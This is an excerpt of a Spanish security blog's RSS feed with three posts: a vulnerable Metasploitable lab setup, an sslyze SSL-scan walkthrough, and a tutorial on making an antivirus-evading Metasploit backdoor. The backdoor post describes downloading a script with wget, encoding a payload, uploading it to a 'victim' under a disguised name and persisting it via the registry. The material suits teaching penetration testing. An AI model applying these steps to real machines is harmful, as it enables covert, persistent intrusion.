src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4015/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4015/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4015/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4015/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4015/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4015/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4015/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4015&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/01/01/y-empieza-otro-ano-2012-ya-esta-aqui/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
		<item>
		<title>Preparando entorno vulnerable para pruebas de pentesting</title>
		<link>http://seifreed.com/2011/12/29/preparando-entorno-vulnerable-para-pruebas-de-pentesting/</link>
		<comments>http://seifreed.com/2011/12/29/preparando-entorno-vulnerable-para-pruebas-de-pentesting/#comments</comments>
		<pubDate>Thu, 29 Dec 2011 06:00:11 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[UltimateLAMP]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4008</guid>
		<description><![CDATA[Hola! Muy  buenas a todos/as! El otro día con la guía de Offensive Security configurábamos un Windows XP Service Pack 2 para hacer pruebas de pentesting. Hoy lo que haremos será preparar un entorno completo vulnerable para hacer pruebas, por ejemplo con Metasploit. El gráfico de red sería el siguiente: Ya tenemos el gráfico del entorno [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4008&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy  buenas a todos/as!</p>
<p>El otro día con la <a href="http://seifreed.com/2011/12/24/preparando-windows-xp-sp2-para-entorno-de-pruebas-de-auditoria/">guía de Offensive Security configurábamos un Windows XP Service Pack 2 para hacer pruebas de pentesting.</a></p>
<p>Hoy lo que haremos será preparar un entorno completo vulnerable para hacer pruebas, por ejemplo con Metasploit.</p>
<p>El gráfico de red sería el siguiente:</p>
<p><img class="aligncenter" src="http://img59.imageshack.us/img59/1918/redtrabajo.png" alt="" width="669" height="627" /></p>
<p>Ya tenemos el gráfico del entorno que configuararemos.</p>
<p>Para trabajar con este entorno lo haremos con una nueva red que añadiremos en VMware</p>
<p><img class="aligncenter" src="http://img196.imageshack.us/img196/15/networkeditor.png" alt="" width="733" height="378" /></p>
<p>Este el menú principal de VMware Workstation 8, nos dirijimos a Virtual Network Editor</p>
<p><img class="aligncenter" src="http://img860.imageshack.us/img860/5571/networkeditor2.png" alt="" width="606" height="534" /></p>
<p>Como no quiero fastidiar ningún entorno que tengo ahora añadiremos una interfaz mas, con otro rango de direcciones IP</p>
<p><img class="aligncenter" src="http://img37.imageshack.us/img37/8066/networkeditor3.png" alt="" width="367" height="258" /></p>
<p>Añadimos la interfaz que deseemos</p>
<p><img class="aligncenter" src="http://img853.imageshack.us/img853/9579/networkeditor4.png" alt="" width="560" height="372" /></p>
<p>He cambiado el rango del DHCP, ahora todas las máquinas del entorno vulnerable serán asignadas a VMnet2</p>
<p>Para el entorno usaremos Metasploitable, pero el que tienen creado en la web de Metasploit, se puede <a href="http://updates.metasploit.com/data/Metasploitable.zip.torrent">descargar aquí</a></p>
<p>Para Windows Server 2003, Windows Server 2000, Windows XP SP2 Y SP3, neesitaremos una licencia válida.</p>
<p>Además de descargar Metasploitable de los chicos de Metasploit, también descargad UltimateLAMP, lo usaremos en el entorno mas tarde, se puede obtener de <a href="http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip">aquí</a></p>
<p>En el siguiente apartado, empezaremos a hacer prácticas con el entorno</p>
<p>&nbsp;</p>
<p>Saludos cordiales</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/metasploit/'>metasploit</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/tag/ultimatelamp/'>UltimateLAMP</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4008/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4008/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4008/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4008/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4008/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4008/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4008/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4008/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4008/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4008/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4008/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4008/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4008/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4008/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4008&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/12/29/preparando-entorno-vulnerable-para-pruebas-de-pentesting/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img59.imageshack.us/img59/1918/redtrabajo.png" medium="image" />

		<media:content url="http://img196.imageshack.us/img196/15/networkeditor.png" medium="image" />

		<media:content url="http://img860.imageshack.us/img860/5571/networkeditor2.png" medium="image" />

		<media:content url="http://img37.imageshack.us/img37/8066/networkeditor3.png" medium="image" />

		<media:content url="http://img853.imageshack.us/img853/9579/networkeditor4.png" medium="image" />
	</item>
		<item>
		<title>Backdoor indetectable generado con Metasploit</title>
		<link>http://seifreed.com/2011/12/28/backdoor-indetectable-generado-con-metasploit/</link>
		<comments>http://seifreed.com/2011/12/28/backdoor-indetectable-generado-con-metasploit/#comments</comments>
		<pubDate>Wed, 28 Dec 2011 06:00:07 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[shitaka ga nai]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4004</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Muchas de las veces en las que se consigue acceso remoto a otro host mediante una vulnerabilidad explotada con Metasploit (por ejemplo) en la que conseguimos una shell con Meterpreter. Es bueno intentar dejar un backdoor por si queremos volver a acceder en un futuro. La problemática de un backdoor [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4004&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Muchas de las veces en las que se consigue acceso remoto a otro host mediante una vulnerabilidad explotada con Metasploit (por ejemplo) en la que conseguimos una shell con Meterpreter. Es bueno intentar dejar un backdoor por si queremos volver a acceder en un futuro.</p>
<p>La problemática de un backdoor instalado en la parte de la víctima es la detección del antivirus, que aunque no sea la panacea de la seguridad, cumple parte de su función.</p>
<p>Para que el ejecutable que dejaremos no sea detectado por el antivirus codificaremos el ejecutable con shitaka ga nai de Metasploit, tras conseguir acceso remoto en el equipo lo dejaremos en el equipo víctima, además pondremos una clave en el registro para que se inicie en cada inicio del sistema operativo.</p>
<p>Para hacer esta tarea, usaremos un script de SecurityLabs y The Hackers News que se llama Vanish, lo podemos descargar de <a href="http://localhostr.com/file/p4SrRVe/vanish.sh">aquí</a></p>
<p>Como dependencias para usar el script hemos de instalar las siguientes dependencias</p>
<blockquote>
<div><em><strong>root@bt:~# </strong>apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils</em></div>
</blockquote>
<p>Nos bajamos el script</p>
<blockquote><p><a href="mailto:root@bt">root@bt</a>:~# wget <a href="http://localhostr.com/file/p4SrRVe/vanish.sh">http://localhostr.com/file/p4SrRVe/vanish.sh</a></p></blockquote>
<p>Si queremos consultar el código fuente del script podemos también verlo en <a href="http://pastebin.com/7xmvGnks">Pastebin</a></p>
<p>Una vez hemos descargado el script, si lo usamos en backtrack como es mi caso, lo hemos de copiar a la carpeta donde se encuentre Metasploit, es decir, /pentest/exploit/framework</p>
<p>Una vez lo hayamos copiado, lo ejecutamos, nos irá haciendo preguntas sobre la targeta de red, un número seed aleatorio y las veces que será encodeado con shitaka ga nai</p>
<p><img class="aligncenter" src="http://img39.imageshack.us/img39/848/shitaka.png" alt="" width="661" height="403" /></p>
<p>El ejecutable se creará, nos hará una firma de hash del ejecutable, además de meterlo en una carpeta que se llama seclab</p>
<p><img class="aligncenter" src="http://img11.imageshack.us/img11/7250/shitaka2.png" alt="" width="688" height="96" /></p>
<p>Para comprobar la fiabilidad de nuestro ejecutable lo subiremos a <a href="http://virustotal.com">Virus Total</a>, del que obtendremos una buena noticia dado el bajo ratio de detección:</p>
<p><img class="aligncenter" src="http://img715.imageshack.us/img715/7484/virustotalp.png" alt="" width="367" height="133" /></p>
<p>El ratio de detección es muy bajo y eso nos permitirá el poder evadir la mayoría de antivirus</p>
<p>Como ya tenemos sesión con Meterpreter es sencillo el poder subir un archivo al host víctima</p>
<p><img class="aligncenter" src="http://img403.imageshack.us/img403/6858/uploadq.png" alt="" width="705" height="49" /></p>
<p>Le cambiado el nombre para que el archivo no se llame backdoor.exe <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>Ahora depende del atacante si quiere dejarlo así y enviar este ejecutable por email o ejecutarlo cada vez que vulnera la máquina o bien, puede añadir una entrada al registro para que se inicie en cada inicio de sistema operativo.</p>
<p>Luego desde la máquina atacante podemos hacer una conexión al host víctima</p>
<p><img class="aligncenter" src="http://img824.imageshack.us/img824/2707/payload.png" alt="" width="580" height="378" /></p>
<p>Podremos tener accesos remotos al equipo víctima tantas veces como deseemos con el backdoor generado.</p>
<p>Saludos cordiales</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/backtrack/'>Backtrack</a>, <a href='http://seifreed.com/category/seguridad/hacking-seguridad/'>Hacking</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/backdoor/'>backdoor</a>, <a href='http://seifreed.com/tag/backtrack/'>Backtrack</a>, <a href='http://seifreed.com/tag/metasploit/'>metasploit</a>, <a href='http://seifreed.com/tag/shitaka-ga-nai/'>shitaka ga nai</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4004/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4004/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4004/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4004/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4004/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4004/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4004/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4004/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4004/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4004/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4004/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4004/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4004/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4004/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4004&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/12/28/backdoor-indetectable-generado-con-metasploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img39.imageshack.us/img39/848/shitaka.png" medium="image" />

		<media:content url="http://img11.imageshack.us/img11/7250/shitaka2.png" medium="image" />

		<media:content url="http://img715.imageshack.us/img715/7484/virustotalp.png" medium="image" />

		<media:content url="http://img403.imageshack.us/img403/6858/uploadq.png" medium="image" />

		<media:content url="http://img824.imageshack.us/img824/2707/payload.png" medium="image" />
	</item>
		<item>
		<title>SSLYZE comprueba la configuración  de tu SSL</title>
		<link>http://seifreed.com/2011/12/27/sslyze-comprueba-la-configuracion-de-tu-ssl/</link>
		<comments>http://seifreed.com/2011/12/27/sslyze-comprueba-la-configuracion-de-tu-ssl/#comments</comments>
		<pubDate>Tue, 27 Dec 2011 06:00:17 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Certificados]]></category>
		<category><![CDATA[SSL]]></category>
		<category><![CDATA[sslyze]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3999</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Cada vez mas es mas importante la seguridad en nuestra página web de SSL, no solo por presencia y seguridad sino por aportar  un grado extra a los clientes y que sepan qu están seguros sus datos viajando por tu página web. Con esta herramienta podremos comprobar la seguridad de nuestra configuración [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=3999&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Cada vez mas es mas importante la seguridad en nuestra página web de SSL, no solo por presencia y seguridad sino por aportar  un grado extra a los clientes y que sepan qu están seguros sus datos viajando por tu página web.</p>
<p>Con esta herramienta podremos comprobar la seguridad de nuestra configuración SSL.</p>
<p>La herramienta está disponible en Code Google <a href="http://code.google.com/p/sslyze/">aquí</a>.</p>
<ul>
<li><strong>Comprobando la renegociación SSL:</strong></li>
</ul>
<p>El que un servidor permite renegociar la sesión es un problema muy grave si no se controla, el que no hayan medidas preventivas como aceleradores SSL o que sólo se pueda renegociar una serie de veces puede acarrear que el servidor sufra una denegación de servicio.</p>
<p>Podemos comprobar si el servidor soporta renegociación:</p>
<blockquote><p>REGISTERING AVAILABLE PLUGINS  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>PluginOpenSSLCipherSuites &#8211; OK    PluginSessionResumption &#8211; OK    PluginCertInfo &#8211; OK    PluginEmpty &#8211; OK    PluginSessionRenegotiation &#8211; OK</p>
<p>CHECKING HOST(S) AVAILABILITY  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>example.com:443                  =&gt; example.com:443</p>
<p>SCAN RESULTS FOR example.com:443 &#8211; example.com:443  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>* Session Renegotiation :</p>
<p>Client-initiated Renegotiations:    Rejected</p>
<p>Secure Renegotiation:               Supported</p>
<p>SCAN COMPLETED IN 0.61 S  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p></blockquote>
<p>Podemos ver en este caso que el servidor soporta renegociación, es susceptible a sufrir un ataque de denegación de servicio</p>
<p>Otra de las comprobaciones que podemos hacer es hacer un resumen de los diferentes &#8220;niveles de ssl&#8221;</p>
<blockquote><p>REGISTERING AVAILABLE PLUGINS  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>PluginOpenSSLCipherSuites &#8211; OK    PluginSessionResumption &#8211; OK    PluginCertInfo &#8211; OK    PluginEmpty &#8211; OK    PluginSessionRenegotiation &#8211; OK</p>
<p>CHECKING HOST(S) AVAILABILITY  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>example.com:443                  =&gt; example.com:443</p>
<p>SCAN RESULTS FOR example.com:443 &#8211; example.com:443  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>* Session Resumption :       Using TLSv1 Session IDs:       Supported       Using TLSv1 Session Tickets:   Supported       Using SSLv3 Session IDs:       Error =&gt; SSL Handshake failed: Failed &#8211; SSL Bad decompression</p>
<p>SCAN COMPLETED IN 0.65 S  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p></blockquote>
<p>Podemos ver que soporta renegociación con diferentes ssl.</p>
<p>En muchas ocasiones el servidor se encuentra detrás de un balanceador de carga que se encarga de balancear las peticiones web  que hacen los usuarios. Con sslyze podemos detectar si el servidor puede encontrarse detrás de un balanceador:</p>
<blockquote><p>REGISTERING AVAILABLE PLUGINS  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>PluginOpenSSLCipherSuites &#8211; OK    PluginSessionResumption &#8211; OK    PluginCertInfo &#8211; OK    PluginEmpty &#8211; OK    PluginSessionRenegotiation &#8211; OK</p>
<p>CHECKING HOST(S) AVAILABILITY  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>example.com:443                  =&gt; example.com:443</p>
<p>SCAN RESULTS FOR example.com:443 &#8211; example.com:443  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>* Session Resumption Rate : 0 resumptions successful out of 100 attempts. Errors were encountered.</p>
<p>SCAN COMPLETED IN 5.10 S  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p></blockquote>
<p>En este caso el servidor NO se encuenta detrás de un balanceador</p>
<ul>
<li><strong>Obtener información aerca del certificado</strong></li>
</ul>
<p>Otra información útil que podemos obtener es información sobre el certificado, información básica</p>
<blockquote><p>REGISTERING AVAILABLE PLUGINS  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>PluginOpenSSLCipherSuites &#8211; OK    PluginSessionResumption &#8211; OK    PluginCertInfo &#8211; OK    PluginEmpty &#8211; OK    PluginSessionRenegotiation &#8211; OK</p>
<p>CHECKING HOST(S) AVAILABILITY  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>example.com:443                  =&gt; example.com:443</p>
<p>SCAN RESULTS FOR example.com:443 &#8211; example.com:443  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>* Certificate :       Validation w/ Mozilla&#8217;s CA Store:  Certificate is NOT Trusted               Subject CN:                        plesk                                    Issuer:                            <a>/C=US/ST=Virginia/L=Herndon/O=Parallels/OU=Plesk/CN=plesk/emailAddress=info@plesk.com</a>       Serial Number:                     4D75F9B5                                 Not before:                        Mar  8 09:41:09 2011 GMT                 Not after:                         Mar  7 09:41:09 2012 GMT                 Keysize:                           2048 bits                                Signature Algorithm:               sha1WithRSAEncryption                    Version:                           1 (0&#215;0)                                  SHA1 Fingerprint:                  A61526A0E8FD6D1A1A028573376EA9BB7C9578C9       Number of Extensions:              0</p>
<p>SCAN COMPLETED IN 0.67 S  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p></blockquote>
<p>Aquí hay información básica sobre el certificado.</p>
<ul>
<li><strong>Información completa sobre un certificado en concreto</strong></li>
</ul>
<blockquote><p>REGISTERING AVAILABLE PLUGINS  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>PluginOpenSSLCipherSuites &#8211; OK    PluginSessionResumption &#8211; OK    PluginCertInfo &#8211; OK    PluginEmpty &#8211; OK    PluginSessionRenegotiation &#8211; OK</p>
<p>CHECKING HOST(S) AVAILABILITY  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>example.com:443                  =&gt; example.com:443</p>
<p>SCAN RESULTS FOR example.com:443 &#8211; example.com:443  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>* Certificate :       Validation w/ Mozilla&#8217;s CA Store:  Certificate is NOT Trusted             Data:         Version: 1 (0&#215;0)         Serial Number: 1299577269 (0x4d75f9b5)         Signature Algorithm: sha1WithRSAEncryption         Issuer: C=US, ST=Virginia, L=Herndon, O=Parallels, OU=Plesk, <a href="mailto:CN=plesk/emailAddress=info@plesk.com">CN=plesk/emailAddress=info@plesk.com</a>         Validity             Not Before: Mar  8 09:41:09 2011 GMT             Not After : Mar  7 09:41:09 2012 GMT         Subject: C=US, ST=Virginia, L=Herndon, O=Parallels, OU=Plesk, <a href="mailto:CN=plesk/emailAddress=info@plesk.com">CN=plesk/emailAddress=info@plesk.com</a>         Subject Public Key Info:             Public Key Algorithm: rsaEncryption             RSA Public Key: (2048 bit)                 Modulus (2048 bit):                     00:ae:f7:6a:2f:de:db:17:bd:2b:4e:57:f5:d7:96:                     fb:50:b9:04:54:8b:1b:5e:61:fe:77:24:99:12:8f:                     cc:1d:49:91:e4:d3:a0:4b:46:0e:b4:80:e4:a7:dd:                     ed:13:1e:90:21:2b:cc:72:54:a8:f7:b3:e1:12:62:                     a7:e5:52:24:66:58:07:25:ab:a0:7d:1a:cc:6c:f5:                     dd:66:4c:aa:07:32:8b:6b:d4:51:eb:f7:93:2f:0a:                     e8:36:f3:8f:7c:b0:68:c7:21:46:65:87:4e:48:92:                     dd:31:c9:d2:81:5f:b2:c1:32:f4:1f:bf:4c:23:65:                     ad:5d:ff:d9:72:ea:a9:90:e7:14:ea:9a:39:b9:43:                     21:cb:ea:37:74:dd:11:e0:c9:35:e2:50:c2:10:6c:                     0d:76:58:b9:74:73:fb:c9:7f:e9:7d:5d:00:05:92:                     1f:3a:8b:fd:ba:7d:e5:c0:1f:16:01:05:9d:88:a4:                     f1:b4:36:5b:cf:67:d3:86:ee:b7:d9:b5:6c:31:c0:                     a9:b3:4a:ba:eb:2b:d7:d4:54:bf:dc:87:2c:66:2c:                     0b:85:ac:6d:4b:7c:e7:ee:04:ca:6c:1c:a1:e9:74:                     c7:b7:fa:38:44:bb:e0:f1:e8:4b:b6:e6:c1:e7:1e:                     9d:06:92:88:55:c2:b0:bf:5b:99:34:db:cc:1b:bf:                     cb:35                 Exponent: 65537 (0&#215;10001)     Signature Algorithm: sha1WithRSAEncryption         8b:f0:45:e6:93:ba:8f:75:51:4c:14:68:47:f6:d1:0c:3b:da:         d9:c9:15:b2:c8:b2:b8:8f:09:35:69:c8:d4:72:cc:3d:6d:e3:         ae:72:90:81:9d:39:8a:62:81:13:42:0a:3a:2f:8c:a6:d4:fb:         40:f1:44:8c:a4:ea:da:c4:a4:c5:ea:96:e2:4f:f8:7d:90:a3:         fd:77:06:e7:92:e1:c3:ab:af:ff:48:b3:69:8f:1f:94:79:11:         b1:98:ac:54:ea:94:e7:e8:7b:5f:6c:fc:d3:8e:69:84:4d:83:         31:ed:4f:b5:b2:0e:60:e9:00:56:29:f5:13:b1:ac:97:84:5c:         55:4c:e3:8b:2f:54:ad:94:39:05:1d:55:27:88:c8:65:be:91:         48:b6:df:09:d0:00:db:b1:cf:c5:8c:c6:23:11:1a:a1:7a:b8:         e0:19:f1:96:b8:75:c3:80:60:93:8e:cd:57:18:fb:14:9d:11:         15:82:69:4d:08:5a:5d:14:18:28:a2:65:dc:8f:69:31:b0:11:         f5:85:18:58:ee:ef:4c:ea:fa:0d:81:a4:e1:9f:bf:da:9d:0f:         0c:f6:41:ce:0b:41:79:2f:ac:a3:1f:88:87:fa:d0:40:10:26:         69:51:86:16:24:e2:ac:a8:ed:12:08:53:85:71:10:4d:19:d6:         a4:25:48:e5</p>
<p>SCAN COMPLETED IN 0.68 S  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p></blockquote>
<p>Aparte de la información básica podemos obtener toda la información sobre el certificado</p>
<ul>
<li><strong>Obtener información sobre el key size del certificado</strong></li>
</ul>
<blockquote><p>REGISTERING AVAILABLE PLUGINS  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>PluginOpenSSLCipherSuites &#8211; OK    PluginSessionResumption &#8211; OK    PluginCertInfo &#8211; OK    PluginEmpty &#8211; OK    PluginSessionRenegotiation &#8211; OK</p>
<p>CHECKING HOST(S) AVAILABILITY  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>example.com:443                  =&gt; example.com:443</p>
<p>SCAN RESULTS FOR example.com:443 &#8211; example.com:443  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>* Certificate :       Validation w/ Mozilla&#8217;s CA Store:  Certificate is NOT Trusted               Keysize:                           2048 bits</p>
<p>SCAN COMPLETED IN 0.66 S  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p></blockquote>
<p>Si solo queremos tener información acerca del tamaño del certificado podemos hacer esta consulta</p>
<ul>
<li><strong>Obtener el CN del certificado</strong></li>
</ul>
<p>Si por el contrario sólo queremos obtenert el CN del  certificado podemos hacer la consulta que nos devolverá:</p>
<blockquote><p>REGISTERING AVAILABLE PLUGINS  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>PluginOpenSSLCipherSuites &#8211; OK    PluginSessionResumption &#8211; OK    PluginCertInfo &#8211; OK    PluginEmpty &#8211; OK    PluginSessionRenegotiation &#8211; OK</p>
<p>CHECKING HOST(S) AVAILABILITY  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>example.com:443                  =&gt; example.com:443</p>
<p>SCAN RESULTS FOR example.com:443 &#8211; example.com:443  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>* Certificate :       Validation w/ Mozilla&#8217;s CA Store:  Certificate is NOT Trusted               Subject CN:                        plesk</p>
<p>SCAN COMPLETED IN 0.91 S  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p></blockquote>
<ul>
<li><strong>Permitir negociar con un cifrado mas bajo</strong></li>
</ul>
<p>Un atacante podría hacer fuerza bruta con los civfrados mas bajo del servidor. Solo se debe permitir negociar con el cifrado mas fuerte</p>
